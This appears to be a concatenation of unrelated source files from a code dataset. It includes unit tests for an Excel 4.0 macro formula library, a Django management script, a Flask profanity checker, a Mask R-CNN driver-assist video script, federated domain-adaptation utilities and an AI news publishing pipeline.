Excel4FormulaArgument("GOTO")) val = "GOTO()" self.assertEqual(str(goto._parse_args()), val, "Should be: " + val) val = "PRZEJDŹ.DO()" self.assertEqual(str(goto._parse_args("pl_PL")), val, "Should be: "+val) # Variable goto = Excel4GoToFormula(1, 1, "GOTO", Excel4Variable(1,2,"NAME","VALUE")) val = "R2C1" self.assertEqual(str(goto._parse_args()), val, "Should be: " + val) val = "W2K1" self.assertEqual(str(goto._parse_args("pl_PL")), val, "Should be: " + val) # Cell goto = Excel4GoToFormula(1, 1, "GOTO", Excel4Formula(1,2,"GOTO")) val = "R2C1" self.assertEqual(str(goto._parse_args()), val, "Should be: " + val) val = "W2K1" self.assertEqual(str(goto._parse_args("pl_PL")), val, "Should be: " + val) ``` #### File: boobsnail/tests/test_excel4_variable.py ```python from unittest import TestCase from excel4lib.macro import * class TestExcel4Variable(TestCase): def test_get_address(self): var = Excel4Variable(1,1, "name", "value") c = "{}".format(var.get_address("pl_PL")) self.assertEqual(c, "W1K1", "Shuold be W1K1") c = "{}".format(var.get_address("en_US")) self.assertEqual(c, "R1C1", "Shuold be R1C1") def test_get_reference(self): var = Excel4Variable(1,1, "name", "value") c = "{}".format(var.get_reference("pl_PL")) self.assertEqual(c, "name", "Should be name") def test__get_value(self): # String as value var = Excel4Variable(1,1, "name", "value") val = var._get_value("pl_PL") self.assertEqual(val, '"value"', 'Shuold be "value"') # Numeric value var = Excel4Variable(1,1, "name", 12121) val = var._get_value("pl_PL") self.assertEqual(val, "12121", "Shuold be 12121") # Cell as value var = Excel4Variable(1,1, "name", Excel4Formula(1,2,"GOTO")) val = var._get_value("pl_PL") self.assertEqual(val, "W2K1", "Shuold be W2K1") val = var._get_value() self.assertEqual(val, "R2C1", "Shuold be R2C1") # Excel4FormulaArgument as value var = Excel4Variable(1,1, "name", Excel4FormulaArgument("GOTO")) val = var._get_value("pl_PL") self.assertEqual(val, "PRZEJDŹ.DO()", "Shuold be PRZEJDŹ.DO()") val = var._get_value() self.assertEqual(val, "GOTO()", "Shuold be GOTO()") def test__get_variable(self): var = Excel4Variable(1,1, "name", "value") val = var._get_variable() self.assertEqual(val, 'name="value"', 'Shuold be name="value"') ```
{ "source": "AAADevs/PyLudus", "score": 3 }
#### File: AAADevs/PyLudus/manage.py ```python import os import sys from typing import List import django from django.contrib.auth import get_user_model from django.core.management import call_command, execute_from_command_line DEFAULT_ENVS = { "DJANGO_SETTINGS_MODULE": "PyLudus.settings", "SUPER_USERNAME": "admin", "SUPER_PASSWORD": "<PASSWORD>", } for key, value in DEFAULT_ENVS.items(): os.environ.setdefault(key, value) class SiteManager: """ Manages the preparation and serving of the website. Handles both development and production environments. Usage: manage.py run [option]... Options: --debug Runs a development server with debug mode enabled. --silent Sets minimal console output. --verbose Sets verbose console output. """ def __init__(self, args: List[str]): self.debug = "--debug" in args self.silent = "--silent" in args if self.silent: self.verbosity = 0 else: self.verbosity = 2 if "--verbose" in args else 1 if self.debug: os.environ.setdefault("DEBUG", "true") print("Starting in debug mode.") @staticmethod def create_superuser() -> None: """Create a default django admin super user in development environments.""" print("Creating a superuser.") name = os.environ["SUPER_USERNAME"] password = os.environ["SUPER_PASSWORD"] user = get_user_model() # Get or create admin superuser. if user.objects.filter(username=name).exists(): user = user.objects.get(username=name) print("Admin superuser already exists.") else: user = user.objects.create_superuser(name, "", password) print("Admin superuser created.") def prepare_server(self) -> None: """Perform preparation tasks before running the server.""" django.setup() print("Making migrations.") call_command("makemigrations", verbosity=self.verbosity) print("Applying migrations.") call_command("migrate", verbosity=self.verbosity) print("Collecting static files.") call_command( "collectstatic", interactive=False, clear=True, verbosity=self.verbosity ) if self.debug: self.create_superuser() def run_server(self) -> None: """Prepare and run the web server.""" in_reloader = os.environ.get("RUN_MAIN") == "true" # Prevent preparing twice when in dev mode due to reloader if not self.debug or in_reloader: self.prepare_server() print("Starting server.") # Run the development server call_command("runserver", "0.0.0.0:8000") def main() -> None: """Entry point for Django management script.""" # Use the custom site manager for launching the server if sys.argv[1] == "run": SiteManager(sys.argv).run_server() # Pass any others directly to standard management commands else: execute_from_command_line(sys.argv) if __name__ == "__main__": main() ```
{ "source": "aa-ag/pg13", "score": 3 }
#### File: pg13/webapp/routes.py ```python from webapp import app from flask import render_template, redirect, url_for, request, jsonify, make_response from better_profanity import profanity @app.route('/about') def about(): return render_template("about.html") @app.route('/') def home(): return render_template("home.html") @app.route('/result', methods=["POST"]) def result(): req = request.get_json() # print(req) as_string = req['input'] checked = "Yes" if profanity.contains_profanity(as_string) == True else "No" # print(checked) censored = profanity.censor(as_string, '🙉') count = censored.count('🙉🙉🙉🙉') # print(censored) res = make_response(jsonify(f'Contains profanity? {checked}. Profanity count: {count}. Censored version: "{censored}"'), 200) # custom = [] # profanity.add_censor_words(custom) return res return render_template("home.html") ```
{ "source": "aaahmedms/Driver-Assist-Machine-Learning-With-RCNN-Mask", "score": 3 }
#### File: aaahmedms/Driver-Assist-Machine-Learning-With-RCNN-Mask/DAML_RCNN_Mask.py ```python import cv2 import numpy as np import os import sys from soco import coco from mrcnn import utils from mrcnn import model as modellib # This portion of the code is specifying the path to the appropiate directories, while also grabbing the weights for the pre-trained model. # The mask_rcnn_coco.h5 file is a pre-trained dataset provided by matterport that act as weights for MS COCO. It is mask-RCNN trained # for object detection. dirMain = os.path.abspath("./") dirModel = os.path.join(dirMain, "logs") sys.path.append(os.path.join(dirMain,"/coco/")) path_Coco = os.path.join(dirMain, "mrcnn/mask_rcnn_coco.h5") # A configuration object is required to make an inference for the Mask_RCNN instance # The configuration is set to specify the number of images per batch class Configure_coco(coco.CocoConfig): # Since we are running inference 1 image at a time, batch size is set to 1. Batch size = GPU_COUNT * IMAGES_PER_GPU GPU_COUNT = 1 IMAGES_PER_GPU = 1 # Creating an object of class Configure_coco to configure the masking model nConfig = Configure_coco() nConfig.display() # MaskRCNN instance object created in inference mode since this mode is used to make estimations for a given image, the dirModel variable is the # path to where the log messages will be stored mrcnn_model = modellib.MaskRCNN( mode="inference", model_dir=dirModel, config=nConfig ) # Load the weights that will be used to calculate the estimations, and assist in classifying the detected object in the frame mrcnn_model.load_weights(path_Coco, by_name=True) # Classification types to compare to for the given trained model class_names = [ 'BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus', 'train', 'truck', 'boat', 'traffic light', 'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear', 'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat', 'baseball glove', 'skateboard', 'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup', 'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple', 'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza', 'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed', 'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote', 'keyboard', 'cell phone', 'microwave', 'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors', 'teddy bear', 'hair drier', 'toothbrush' ] # This function applies a cyan coloured mask with a 50% opacity to the ROI detected in the source image def apply_mask(cyan_col, mask, source, transp=0.5): for n, c in enumerate(cyan_col): source[:, :, n] = np.where( mask == 1, source[:, :, n] * (1 - transp) + transp * c, source[:, :, n] ) return source # Apply the mask, bounding box, and classification to the region of interest def mask_frame(source, region_interest, masks, class_ids, cls_names, scores): # Number of instances found in ROI n_instances = region_interest.shape[0] if not n_instances: print('NO Instances FOUND in ROI') else: assert region_interest.shape[0] == masks.shape[-1] == class_ids.shape[0] # For each instance found apply mask, box, and label for i in range(n_instances): # Detect only road obstacles from the class names specified in the class_names array above. class_names[1 .. 14] if class_ids[i] in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]: if not np.any(region_interest[i]): continue # Coordinates for region of interest y1, x1, y2, x2 = region_interest[i] # Classification for the ROI label = class_names[class_ids[i]] # Confidence score in relation to its classification score = scores[i] if scores is not None else None # Store classification and score as a string caption to the object detected to be used as a label caption = '{} {:.2f}'.format(label, score) if score else label mask = masks[:, :, i] # Cyan color for mask / bounding box / label in BGR cyan_col = (240,252,3) # Apply the mask on the detected object source = apply_mask(cyan_col, mask, source) # Draw bounding box using the x/y coordinates from the roi on the detected object source = cv2.rectangle(source, (x1, y1), (x2, y2), cyan_col, 1) # Write the label classification above the detected object using the x/y coordinates source = cv2.putText( source, caption, (x1, y1), cv2.FONT_HERSHEY_COMPLEX, 0.7, cyan_col, 1 ) return source # Pre-Captured Video Source: stream = cv2.VideoCapture("VideoSourceFile/Freewaytest.mp4") # get original video size width = stream.get(cv2.CAP_PROP_FRAME_WIDTH) # float value, converted to integer in the next line when writing height = stream.get(cv2.CAP_PROP_FRAME_HEIGHT) # float value, converted to integer in the next line when writing # Create VideoWriter object # 0x7634706d is the (*'MP4V') video writing formatting, with an output resolution of the original size. video_output = cv2.VideoWriter('OutputVideo/output.mp4', 0x7634706d, 60.0, (int(width),int(height))) # Start capturing footage frame by frame and apply mask while True: # read in the stream wether its live camera feed or a video footage is_streaming , frame = stream.read() if not is_streaming: print("Finished stream, ending program") break #Make a prediction with the model creating a dictionary with a set of key value pairs that list possible objects detected get_frame_results = mrcnn_model.detect([frame], verbose=1) # Apply the bounding boxes, mask and classification to the footage after setting up the dictionary of key value pairs # Following keypoints in the dictionary # rois: Bounding boxes / regions of interest (ROI) for objects detected # masks: Masks to generate for objects detected # class_ids: Reference to the classification types # scores: Confidence score in relation to its classification to determine what it is detected_frame = get_frame_results[0] masked_image = mask_frame(frame, detected_frame['rois'], detected_frame['masks'], detected_frame['class_ids'], class_names, detected_frame['scores']) # Write to the video output video_output.write(masked_image) cv2.imshow("Driver Assist Machine Learning RCNN Mask",masked_image) # Press 'q' to exit the program early, the output video file will still be generated if terminated early if(cv2.waitKey(1) & 0xFF == ord('q')): break # Release Stream and video writing stream.release() video_output.release() cv2.destroyWindow("Driver Assist Machine Learning RCNN Mask") ```
{ "source": "AAAI2021-255/DFDA", "score": 2 }
#### File: DFDA/datasets/AmazonReview.py ```python import numpy as np import time import pickle from scipy.sparse import coo_matrix import torch.utils.data as data from PIL import Image import numpy as np from scipy.io import loadmat from os import path import torchvision.transforms as transforms from torch.utils.data import DataLoader class AmazonReviewDataset(data.Dataset): def __init__(self, data, labels): self.data = data self.labels = labels def __getitem__(self, index): tensor, label = np.squeeze(np.asarray(self.data[index])), self.labels[index] return tensor, label def __len__(self): return len(self.data) def load_amazon(base_path): dimension = 5000 amazon = np.load(path.join(base_path, "dataset", "AmazonReview", "amazon.npz")) amazon_xx = coo_matrix((amazon['xx_data'], (amazon['xx_col'], amazon['xx_row'])), shape=amazon['xx_shape'][::-1]).tocsc() amazon_xx = amazon_xx[:, :dimension] amazon_yy = amazon['yy'] amazon_yy = (amazon_yy + 1) / 2 amazon_offset = amazon['offset'].flatten() # Partition the data into four categories and for each category partition the data set into training and test set. data_name = ["books", "dvd", "electronics", "kitchen"] num_data_sets = 4 data_insts, data_labels, num_insts = [], [], [] for i in range(num_data_sets): data_insts.append(amazon_xx[amazon_offset[i]: amazon_offset[i + 1], :]) data_labels.append(amazon_yy[amazon_offset[i]: amazon_offset[i + 1], :]) num_insts.append(amazon_offset[i + 1] - amazon_offset[i]) # Randomly shuffle. r_order = np.arange(num_insts[i]) np.random.shuffle(r_order) data_insts[i] = data_insts[i][r_order, :] data_labels[i] = data_labels[i][r_order, :] data_insts[i] = data_insts[i].todense().astype(np.float32) data_labels[i] = data_labels[i].ravel().astype(np.int64) return data_insts, data_labels def amazon_dataset_read(base_path, domain, batch_size): data_insts, data_labels = load_amazon(base_path) if domain == "books": train_image, train_label, test_image, test_label = data_insts[0][:2000], data_labels[0][:2000], data_insts[0][ 2000:], \ data_labels[0][2000:] elif domain == "dvd": train_image, train_label, test_image, test_label = data_insts[1][:2000], data_labels[1][:2000], data_insts[1][ 2000:], \ data_labels[1][2000:] elif domain == "electronics": train_image, train_label, test_image, test_label = data_insts[2][:2000], data_labels[2][:2000], data_insts[2][ 2000:], \ data_labels[2][2000:] elif domain == "kitchen": train_image, train_label, test_image, test_label = data_insts[3][:2000], data_labels[3][:2000], data_insts[3][ 2000:], \ data_labels[3][2000:] else: raise NotImplementedError("Domain {} Not Implemented".format(domain)) # raise train and test data loader train_dataset = AmazonReviewDataset(data=train_image, labels=train_label) train_loader = DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True, num_workers=4) test_dataset = AmazonReviewDataset(data=test_image, labels=test_label) test_loader = DataLoader(dataset=test_dataset, batch_size=batch_size, shuffle=True, num_workers=4) return train_loader, test_loader ``` #### File: DFDA/lib/dataloader.py ```python from torchvision import transforms, datasets from torch.utils.data import DataLoader from torch.utils.data.sampler import SubsetRandomSampler import torch cifar10_label_map = {0: 0, 1: 2, 2: 1, 3: 3, 4: 4, 5: 5, 6: 1000, 7: 6, 8: 8, 9: 9} def cifar10_label_transform(label): return cifar10_label_map[label] def stl10_dataset(dataset_base_path, train_flag=True): transform = transforms.Compose([ transforms.Resize(128), transforms.ToTensor() ]) if train_flag: transform = transforms.Compose([ transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transform ]) if train_flag: split = "train" else: split = "test" dataset = datasets.STL10(root=dataset_base_path, transform=transform, split=split) return dataset def cifar10_dataset(dataset_base_path, train_flag=True, target_domain=False): if target_domain: target_transform = cifar10_label_transform else: target_transform = None transform = transforms.Compose([ transforms.ToTensor(), transforms.Normalize(mean=(0.4914, 0.4822, 0.4465), std=(0.2023, 0.1994, 0.2010)) ]) if train_flag: transform = transforms.Compose([ transforms.Pad(4, padding_mode='reflect'), transforms.RandomHorizontalFlip(), transforms.RandomCrop(32), transform ]) dataset = datasets.CIFAR10(root=dataset_base_path, train=train_flag, download=False, transform=transform,target_transform=target_transform) return dataset def cifar100_dataset(dataset_base_path, train_flag=True): transform = transforms.Compose([ transforms.ToTensor(), transforms.Normalize(mean=(0.5071, 0.4867, 0.4408), std=(0.2675, 0.2565, 0.2761)) ]) if train_flag: transform = transforms.Compose([ transforms.Pad(4, padding_mode='reflect'), transforms.RandomHorizontalFlip(), transforms.RandomCrop(32), transform ]) dataset = datasets.CIFAR100(root=dataset_base_path, train=train_flag, download=False, transform=transform) return dataset def svhn_dataset(dataset_base_path, train_flag=True): transform = transforms.Compose([ transforms.ToTensor(), transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5)) ]) if train_flag: transform = transforms.Compose([ transforms.Pad(4, padding_mode='reflect'), transforms.RandomHorizontalFlip(), transforms.RandomCrop(32), transform ]) if train_flag: dataset = datasets.SVHN(root=dataset_base_path, split='train', transform=transform, download=True) else: dataset = datasets.SVHN(root=dataset_base_path, split='test', transform=transform, download=True) return dataset def get_ssl_sampler(labels, valid_num_per_class, annotated_num_per_class, num_classes): """ :param labels: torch.array(int tensor) :param valid_num_per_class: the number of validation for each class :param annotated_num_per_class: the number of annotation we use for each classes :param num_classes: the total number of classes :return: sampler_l,sampler_u """ sampler_valid = [] sampler_train_l = [] sampler_train_u = [] for i in range(num_classes): loc = torch.nonzero(labels == i) loc = loc.view(-1) # do random perm to make sure uniform sample loc = loc[torch.randperm(loc.size(0))] sampler_valid.extend(loc[:valid_num_per_class].tolist()) sampler_train_l.extend(loc[valid_num_per_class:valid_num_per_class + annotated_num_per_class].tolist()) # sampler_train_u.extend(loc[num_valid + annotated_num_per_class:].tolist()) # here the unsampled part also include the train_l part sampler_train_u.extend(loc[valid_num_per_class:].tolist()) sampler_valid = SubsetRandomSampler(sampler_valid) sampler_train_l = SubsetRandomSampler(sampler_train_l) sampler_train_u = SubsetRandomSampler(sampler_train_u) return sampler_valid, sampler_train_l, sampler_train_u def get_sl_sampler(labels, valid_num_per_class, num_classes): """ :param labels: torch.array(int tensor) :param valid_num_per_class: the number of validation for each class :param num_classes: the total number of classes :return: sampler_l,sampler_u """ sampler_valid = [] sampler_train = [] for i in range(num_classes): loc = torch.nonzero(labels == i) loc = loc.view(-1) # do random perm to make sure uniform sample loc = loc[torch.randperm(loc.size(0))] sampler_valid.extend(loc[:valid_num_per_class].tolist()) sampler_train.extend(loc[valid_num_per_class:].tolist()) sampler_valid = SubsetRandomSampler(sampler_valid) sampler_train = SubsetRandomSampler(sampler_train) return sampler_valid, sampler_train if __name__ == "__main__": from glob import glob from torch.utils.data import DataLoader ``` #### File: lib/utils/federated_utils.py ```python from itertools import permutations, combinations import torch def create_domain_weight(source_domain_num): global_federated_matrix = [1 / (source_domain_num + 1)] * (source_domain_num + 1) return global_federated_matrix def update_domain_weight(global_domain_weight, epoch_domain_weight, momentum=0.9): global_domain_weight = [round(global_domain_weight[i] * momentum + epoch_domain_weight[i] * (1 - momentum), 4) for i in range(len(epoch_domain_weight))] return global_domain_weight def federated_average(model_list, coefficient_matrix, batchnorm_mmd=True): """ :param model_list: a list of all models needed in federated average. [0]: model for target domain, [1:-1] model for source domains :param coefficient_matrix: the coefficient for each model in federate average, list or 1-d np.array :param batchnorm_mmd: bool, if true, we use the batchnorm mmd :return model list after federated average """ if batchnorm_mmd: dict_list = [it.state_dict() for it in model_list] dict_item_list = [dic.items() for dic in dict_list] for key_data_pair_list in zip(*dict_item_list): source_data_list = [pair[1] * coefficient_matrix[idx] for idx, pair in enumerate(key_data_pair_list)] dict_list[0][key_data_pair_list[0][0]] = sum(source_data_list) for model in model_list: model.load_state_dict(dict_list[0]) else: named_parameter_list = [model.named_parameters() for model in model_list] for parameter_list in zip(*named_parameter_list): source_parameters = [parameter[1].data.clone() * coefficient_matrix[idx] for idx, parameter in enumerate(parameter_list)] parameter_list[0][1].data = sum(source_parameters) for parameter in parameter_list[1:]: parameter[1].data = parameter_list[0][1].data.clone() def knowledge_vote(knowledge_list, confidence_gate, num_classes): """ :param torch.tensor knowledge_list : recording the knowledge from each source domain model :param float confidence_gate: the confidence gate to judge which sample to use :return: consensus_confidence,consensus_knowledge,consensus_knowledge_weight """ max_p, max_p_class = knowledge_list.max(2) max_conf, _ = max_p.max(1) max_p_mask = (max_p > confidence_gate).float().cuda() consensus_knowledge = torch.zeros(knowledge_list.size(0), knowledge_list.size(2)).cuda() for batch_idx, (p, p_class, p_mask) in enumerate(zip(max_p, max_p_class, max_p_mask)): # to solve the [0,0,0] situation if torch.sum(p_mask) > 0: p = p * p_mask for source_idx, source_class in enumerate(p_class): consensus_knowledge[batch_idx, source_class] += p[source_idx] consensus_knowledge_conf, consensus_knowledge = consensus_knowledge.max(1) consensus_knowledge_mask = (max_conf > confidence_gate).float().cuda() consensus_knowledge = torch.zeros(consensus_knowledge.size(0), num_classes).cuda().scatter_(1, consensus_knowledge.view( -1, 1), 1) return consensus_knowledge_conf, consensus_knowledge, consensus_knowledge_mask def calculate_consensus_focus(consensus_focus_dict, knowledge_list, confidence_gate, source_domain_numbers, num_classes): """ :param consensus_focus_dict: record consensus_focus for each domain :param torch.tensor knowledge_list : recording the knowledge from each source domain model :param float confidence_gate: the confidence gate to judge which sample to use :param source_domain_numbers: the numbers of source domains """ domain_contribution = {frozenset(): 0} for combination_num in range(1, source_domain_numbers + 1): combination_list = list(combinations(range(source_domain_numbers), combination_num)) for combination in combination_list: consensus_knowledge_conf, consensus_knowledge, consensus_knowledge_mask = knowledge_vote( knowledge_list[:, combination, :], confidence_gate, num_classes) domain_contribution[frozenset(combination)] = torch.sum( consensus_knowledge_conf * consensus_knowledge_mask).item() permutation_list = list(permutations(range(source_domain_numbers), source_domain_numbers)) permutation_num = len(permutation_list) for permutation in permutation_list: permutation = list(permutation) for source_idx in range(source_domain_numbers): consensus_focus_dict[source_idx + 1] += ( domain_contribution[frozenset( permutation[:permutation.index(source_idx) + 1])] - domain_contribution[ frozenset(permutation[:permutation.index(source_idx)])] ) / permutation_num return consensus_focus_dict def decentralized_training_strategy(communication_rounds, epoch_samples, batch_size, total_epochs): """ Split one epoch into r rounds and perform model aggregation :param communication_rounds: the communication rounds in training process :param epoch_samples: the samples for each epoch :param batch_size: the batch_size for each epoch :param total_epochs: the total epochs for training :return: batch_per_epoch, total_epochs with communication rounds r """ if communication_rounds >= 1: epoch_samples = round(epoch_samples / communication_rounds) total_epochs = round(total_epochs * communication_rounds) batch_per_epoch = round(epoch_samples / batch_size) elif communication_rounds in [0.2, 0.5]: total_epochs = round(total_epochs * communication_rounds) batch_per_epoch = round(epoch_samples / batch_size) else: raise NotImplementedError( "The communication round {} illegal, should be 0.2 or 0.5".format(communication_rounds)) return batch_per_epoch, total_epochs ```
{ "source": "AAAI/AINews", "score": 2 }
#### File: AAAI/AINews/AINewsPublisher.py ```python import feedparser import sys import operator import re import urllib2 from lxml import etree from os import path, mkdir, remove from glob import glob from random import shuffle from subprocess import * from datetime import date, datetime, timedelta from AINewsTools import savefile from AINewsConfig import config, paths, blacklist_urls from AINewsDB import AINewsDB from AINewsCorpus import AINewsCorpus from AINewsDuplicates import AINewsDuplicates from AINewsTextProcessor import AINewsTextProcessor from AINewsSummarizer import AINewsSummarizer from AINewsWekaClassifier import AINewsWekaClassifier sys.path.append(paths['templates.compiled']) from FeedImport import FeedImport from LatestNewsEmail import LatestNewsEmail class AINewsPublisher(): def __init__(self): self.debug = config['ainews.debug'] self.today = date.today() self.earliest_date = self.today - timedelta(days = int(config['ainews.period'])) self.db = AINewsDB() self.corpus = AINewsCorpus() self.duplicates = AINewsDuplicates() self.txtpro = AINewsTextProcessor() self.weka = AINewsWekaClassifier() self.articles = {} self.semiauto_email_output = "" def filter_and_process(self): self.articles = self.corpus.get_unprocessed() if len(self.articles) == 0: return # assume every article will be published; may be set to False from one # of the filtering processes below for urlid in self.articles: self.articles[urlid]['publish'] = True self.articles[urlid]['transcript'] = [] # filter by date print "Filtering by date..." for urlid in self.articles: if self.articles[urlid]['pubdate'] == None: # give a meaningful pubdate so that other code doesn't crash self.articles[urlid]['pubdate'] = self.today self.articles[urlid]['publish'] = False self.articles[urlid]['transcript'].append("Rejected due to bogus publication date.") elif self.articles[urlid]['pubdate'] < self.earliest_date: self.articles[urlid]['publish'] = False self.articles[urlid]['transcript'].append( ("Rejected because article is too old " + "(earliest valid date is %s while article was " + "published on %s") % (self.earliest_date.strftime('%F'), self.articles[urlid]['pubdate'].strftime('%F'))) # filter by blacklist (for urls) print "Filtering by blacklist..." for urlid in self.articles: for black in blacklist_urls: if re.search(black, self.articles[urlid]['url']): self.articles[urlid]['publish'] = False self.articles[urlid]['transcript'].append( ("Rejected because url matched blacklisted url %s" % black)) break # filter by whitelist print "Filtering by whitelist..." for urlid in self.articles: white_wordfreq = self.txtpro.whiteprocess(urlid, self.articles[urlid]['content']) self.articles[urlid]['white_wordfreq'] = white_wordfreq # require at least two different whitelisted terms # unless the article is user-submitted if len(white_wordfreq) < 2 \ and self.articles[urlid]['source'] != 'User Submitted': self.articles[urlid]['publish'] = False self.articles[urlid]['transcript'].append( 'Rejected due to only one or no whitelisted terms') # update categories based on classifier predictions print "Classifying..." self.weka.predict(self.articles) # drop articles with no categories print "Dropping articles with no categories..." for urlid in self.articles: if len(self.articles[urlid]['categories']) == 0: self.articles[urlid]['publish'] = False self.articles[urlid]['transcript'].append( 'Rejected due to no selected categories') # filter out duplicates; some articles may have 'publish' set to False # by this function print "Filtering duplicates..." self.duplicates.filter_duplicates(self.articles) for urlid in self.articles: print urlid, self.articles[urlid]['publish'], \ self.articles[urlid]['title'], \ self.articles[urlid]['categories'], \ self.articles[urlid]['summary'] print print "Grabbing images..." for urlid in self.articles: # grab and convert article image (if it exists) self.grab_convert_image(self.articles[urlid]) # update article in database self.update_db(self.articles[urlid]) # mark each as processed print "Marking as processed." self.corpus.mark_processed(self.articles.itervalues()) def grab_convert_image(self, article): if len(article['image_url']) == 0: article['image_path'] = '' return try: f = urllib2.urlopen(article['image_url']) img = open("%s%s" % (paths['ainews.image_dir'], str(article['urlid'])), 'w') img.write(f.read()) img.close() # produces [urlid].jpg Popen("%s -format jpg -gravity Center -thumbnail 200x200 %s%s" % \ (paths['imagemagick.mogrify'], paths['ainews.image_dir'], str(article['urlid'])), shell = True).communicate() # remove [urlid] file (with no extension) remove("%s%s" % (paths['ainews.image_dir'], str(article['urlid']))) article['image_path'] = "public://newsfinder_images/%s.jpg" % article['urlid'] except Exception as e: print "Failed converting image for %d: %s" % (article['urlid'], e) article['image_path'] = '' def update_db(self, article): self.db.execute("delete from categories where urlid = %s", article['urlid']) for cat in article['categories']: self.db.execute("insert into categories values (%s,%s)", (article['urlid'], cat)) def generate_feed_import(self): """ Generate XML file for feed import on the Drupal site. """ xml = FeedImport() for article in self.articles.values(): article['source'] = re.sub(r'&', '&amp;', article['source']) xml.news = self.articles.values() savefile(paths['ainews.output_xml'] + "news.xml", str(xml)) def generate_email_output(self): articles = [] try: f = urllib2.urlopen(paths['ainews.top_weekly_news_xml']) xml = etree.parse(f) for node in xml.iter("node"): print "Found", node.findtext("Title") published = node.findtext("Publication_date") articles.append({'title': node.findtext("Title"), 'source': node.findtext("Source"), 'topics': re.sub(r'/topic/', 'http://aitopics.org/topic/', node.findtext("Topics")), 'pubdate': date(int(published[0:4]), int(published[5:7]), int(published[8:10])), 'summary': re.sub(r'</p>(</blockquote>)?$', '', re.sub(r'^(<blockquote>)?<p>', '', node.findtext("Body"))), 'url': node.findtext("Original_link"), 'link': re.sub(r'/news/', 'http://aitopics.org/news/', node.findtext("Link")), 'image': re.sub(r'<img', '<img align="left" style="margin: 8px 8px 8px 0; border: 1px solid #ccc; padding: 5px; background: white;" ', node.findtext("Representative_image"))}) except Exception, e: print e email = LatestNewsEmail() email.date = self.today.strftime("%B %d, %Y") email.year = self.today.strftime("%Y") email.articles = articles email_output = str(email) return email_output def publish_email_semiauto(self): """ Create an AINewsSemiAutoEmail.html file for admin to click and semi-auto send it to the subscriber list. """ output = self.generate_email_output() semiauto = """ <html> <head> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="-1"> </head> <body> <h1>AI Alert - SemiAuto Sender</h1> <form action="http://aaai.org/cgi-dada/mail.cgi?flavor=send_email" method='post'> <!-- <form action="welcome.php" method="post"> --> <input type='hidden' name='f' value='send_email' /> <input type='hidden' name='process' value='true' /> <input type='hidden' name='admin_list' value='alert' /> <input type='hidden' name='message_subject' value="%s" /> <input type='hidden' name='email_format' value='HTML' /> <textarea type='hidden' name="text_message_body">%s</textarea> <input type='submit' value='Submit Mailing List Message' /> </form> <h2>Please review the email below. If there are concerns, contact Bruce or Reid:</h2> <p> %s </p> </body> <head> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="-1"> </head> </html> """ % ("AI Alert - "+str(self.today.strftime("%B %d, %Y")), output, output) savefile(paths['ainews.html'] + "semiauto_email.html", semiauto) ``` #### File: AAAI/AINews/AINewsWekaClassifier.py ```python import re import pickle import arff import csv from nltk.probability import FreqDist from os import listdir, remove from subprocess import * from AINewsCorpus import AINewsCorpus from AINewsConfig import config, paths from AINewsTextProcessor import AINewsTextProcessor class AINewsWekaClassifier: def __init__(self): self.txtpro = AINewsTextProcessor() def __save_bag_of_words(self, tid, fieldidx): # find all unique words in the arff 'title' field, remove stop # words, perform stemming, collect their frequencies phrases = [] f = arff.load(open("%s%d.arff" % (paths['weka.training_arff_dir'], tid), 'r')) for record in f['data']: phrases.append(record[fieldidx]) bag = self.txtpro.simpletextprocess(0, ' '.join(phrases)) smallerbag = FreqDist() i = 0 for word in bag: if i == 1000: break smallerbag[word] = bag[word] i += 1 p = open("%sbag_of_words-%d.pickle" % (paths['weka.bag_of_words_dir'], fieldidx), 'w') pickle.dump(smallerbag, p) p.close() def __prepare_arff(self, tid): p = open("%sbag_of_words-0.pickle" % paths['weka.bag_of_words_dir'], 'r') bag_title = pickle.load(p) p.close() p = open("%sbag_of_words-1.pickle" % paths['weka.bag_of_words_dir'], 'r') bag_body = pickle.load(p) p.close() data = {'attributes': [], 'data': [], 'description': u'', 'relation': tid} for word in bag_title: data['attributes'].append(("title-%s" % word, 'NUMERIC')) for word in bag_body: data['attributes'].append(("body-%s" % word, 'NUMERIC')) data['attributes'].append(('class', ['yes', 'no'])) f = arff.load(open("%s%d.arff" % (paths['weka.training_arff_dir'], tid), 'r')) for record in f['data']: record_bag_title = self.txtpro.simpletextprocess(0, record[0]) record_bag_body = self.txtpro.simpletextprocess(0, record[1]) record_data = [] # iterate through original bag, figure out freq in this record's bag for word in bag_title: if word in record_bag_title: record_data.append(record_bag_title[word]) else: record_data.append(0) for word in bag_body: if word in record_bag_body: record_data.append(record_bag_body[word]) else: record_data.append(0) record_data.append(record[2]) data['data'].append(record_data) fnew = open("%s%d-wordvec-nonsparse.arff" % \ (paths['weka.training_arff_dir'], tid), 'w') arff.dump(fnew, data) fnew.close() # convert to sparse format Popen(("java -cp %s weka.filters.unsupervised.instance.NonSparseToSparse " + "-i %s%d-wordvec-nonsparse.arff -o %s%d-wordvec.arff") % \ (paths['weka.weka_jar'], paths['weka.training_arff_dir'], tid, paths['weka.training_arff_dir'], tid), shell = True).communicate() remove("%s%d-wordvec-nonsparse.arff" % (paths['weka.training_arff_dir'], tid)) # 1. load unprocessed arff files, from just one tid, from family_resemblance export # 2. gather all titles, parse into a bag of words # 3. save bag of words (list? need to keep the order) in a pickle file # 4. write new sparse arff files for each tid using this sorted bag of words def __get_tids(self): tids = [] files = listdir(paths['weka.training_arff_dir']) for f in files: m = re.match(r'^(\d+).arff$', f) if m: if m.group(1) == '0': continue tids.append(int(m.group(1))) return tids def train(self): tids = self.__get_tids() # all tid arffs have same 